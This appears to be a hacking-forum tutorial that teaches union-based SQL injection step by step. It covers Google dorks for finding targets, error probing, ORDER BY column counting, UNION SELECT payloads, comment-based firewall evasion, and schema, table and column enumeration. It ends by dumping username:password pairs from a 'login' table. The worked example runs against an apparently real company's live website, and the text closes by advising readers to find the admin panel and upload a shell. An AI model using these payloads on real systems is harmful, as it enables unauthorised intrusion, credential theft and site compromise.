we see how we create databases,tables,columns, and add record in it in different ways and now
in this article , we will be covering on SQL injections ... how we can hack using sql injection
please rep+ if you like it .. it took my 1 hour to complete
what is sql injection???
SQL injection is a very common method of hacking websies in this era..
well, sql injection is a big thing, newbies think that this is not a big
deal, as they can exploit this vulnerability with scripts like
sqlmap, havij , sqlninja other kiddies scripts
but SQL injection can be a huge thing that it can took many books to complete
So what you can DO with SQL injection
You can access records,
you can modify records
you can bypass Login areas
You can breach sql server
okay here our first step begins
Finding Vulnerable websites
well..if you are a hacker..You must know that
search engines are your best friends... we can find vulnerable websites
using google dorks...?
common dorks are
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=
etc there is a huge list of dorks
now if you search anyone of these.. you will find many websites,,, open any of them
and you will see url like
Code:
website.com/index.php?id=1okay to test that if site is vulnerable, just put a ' at the end of url
and make it look like
Code:
website.com/index.php?id=1'and if you see some error like
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
or
Warning: mysql_fetch_array()
or any mysql error... etc or if you see any content of page missing
then the site is vulnerable
example
![[Image: lgtf2af.png]](http://img541.imageshack.us/img541/1234/lgtf2af.png)
you see its mysql error..so the website is vulnerable
So now lets move to next step
EXPLOITING the vulnerablity
now so we have find vuln website..its time to fetching secret data
so what is our next step
to find the number of columns in the tablefor that we replace ' with order by statment
like
Code:
website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--we need to increase the order by number till we get some error like
unknown column numbers or we found some content missing in the page
example
Code:
http://www.cementcorporation.co.in/page.php?id=20 order by 1-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 2-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 3-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 10-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 20-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 21-- ERROR / CONTENT MISSING IN PAGESO NOW WE SEE THAT WE GOT ERROR AT ORDER BY 21 , BUT NO ERROR AT ORDER BY 20,
SO THAT MEANS WE HAVE 20 COLUMNS
some times this thing never works, we dont get error even at order by 1000
in that case we put ' at the end of id / parameter and put + at the end
like
Code:
http://www.cementcorporation.co.in/page.php?id=20' order by 21--+ errornow next step begins
Union Select
NOW, we know we have 20 columns, now its time to select all the columns using union select
select statment is use to view data , if you want to learn more about sql, you can check my
article on working with SQL..
oka for now
we use statment like
Code:
http://www.cementcorporation.co.in/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--now you will see any DIGIT of columns on page
like 1 5 7 or anyone
if you dont see, place - before parameter value
example
Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--you can see in below picture
you can see 3 and 4 on the web page .. these two are string columns..
we can retrieve our data in these columns
sometimes union select dont work due to WAF (web app firewall) ,, we add comments in our queries like
/*!union*/+/*!select*/
/*!union*/+(/*!select*/
un/**/ion+sel/**/ect+1,2,3—
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3—
or change case
/*!UnIOn*//*!SeLect*/+1,2,3—
etc
![[Image: oksohyM.png]](http://i.imgur.com/oksohyM.png)
now its time to retrive data in these columns
we can retrive sensitive data .. we can call functions for database name database(), version info version() or @@version, user info user(),
concat, group_concat(), LOAD_FILE etc and many more
oka for the tutorial, i will call version function in column 3 and db and user info in
column 4 using group_concat()...
for that i will use
Code:
http://www.cementcorporation.co.in/page.php?id=-20
union select
1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,1
6,17,18,19,20--I used 0x3a beacause its a hex value of SEMICOLON ( ; ) AND it will seprate two different values of different parameters
now u can see in the image the column 3 and 4 are now replace with values that I called
![[Image: mYXScSV.png]](http://i.imgur.com/mYXScSV.png)
okay .. next thing
how to find all databases in the website ??
okay thats easy
now we need to replace column name with
query like this
Code:
http://www.cementcorporation.co.in/page.php?id=-20
union select
1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
from information_schema.schemata--see
![[Image: lgt73e3.png]](http://img407.imageshack.us/img407/4513/lgt73e3.png)
now we know there are basicaly two databases,
information_schema and cementco_cement
ignore information_schema
why? because information_schema are system tables which define
databases.. we can use these tables to look at the database layout style
okay now we have our database ( we dont need to check, we can use its value actually, if we are trying to dump in current database,,, we can use
its function too.. database() instead of cementco_cement.. its needed when we are dumping in outside of current database
but in this case we will be simple dumping)
okay let now lets find the tables in current db
we will use WHERE , condtion in this query now
we will fetch tables with select statement and use where condtion to determine which database tables we want to fetch
okay
syntax
Code:
http://www.cementcorporation.co.in/page.php?id=-20
union select
1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
from information_schema.tables where table_schema=database()--![[Image: lgt97a9.png]](http://img845.imageshack.us/img845/8972/lgt97a9.png)
now you can see we have all table names
which are
archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint, tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animat ion,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,t bl_tnc,tender,tender2,tender3,tender_drawing,unit
now we gonna dump in sensitive table
which is login
okay... lets dump it
now we will replace group_concat(table_name) with group_concat(column_name) and information_schema.tables with information_schema.columns
and in where condtion we will change table_schema with table_name
and will give parameter of table_name = name of table in qoute like
table_name='login'
why used qoute? because its datatype is varchar ..
sometimes it does not work
so we have to covert it into mysql char ... for that i use hack bar
so now our query looks like
mysql char value of login is CHAR(108, 111, 103, 105, 110)
exmaple
Code:
http://www.cementcorporation.co.in/page.php?id=-20
union select
1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
from information_schema.columns where table_name=CHAR(108, 111, 103,
105, 110)--yeahhhh..now we can see columns of table 'login'
which are ...id,username,password,email,date_added,lastlogin,sessionid,type,status
![[Image: 2uxh8Qh.png]](http://i.imgur.com/2uxh8Qh.png)
okayy...now the fun begins... time to dump the columns...
for example if we need to dump username and password columns from table 'login' we will replace the query with
select group_concat(username,0x3a,password) from login--
dumped
syntax
Code:
http://www.cementcorporation.co.in/page.php
?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from login--![[Image: sE3M29s.png]](http://i.imgur.com/sE3M29s.png)
you can see username:password in the webpage
now just find admin panel and upload the shell
it was easy?? yeah.. but sometime waf can fuff your mind
now .. dealing with error based sql injections
well i have already posted this tutorial here
http://www.madleets.com/Thread-double-qu...tion-video
Post a Comment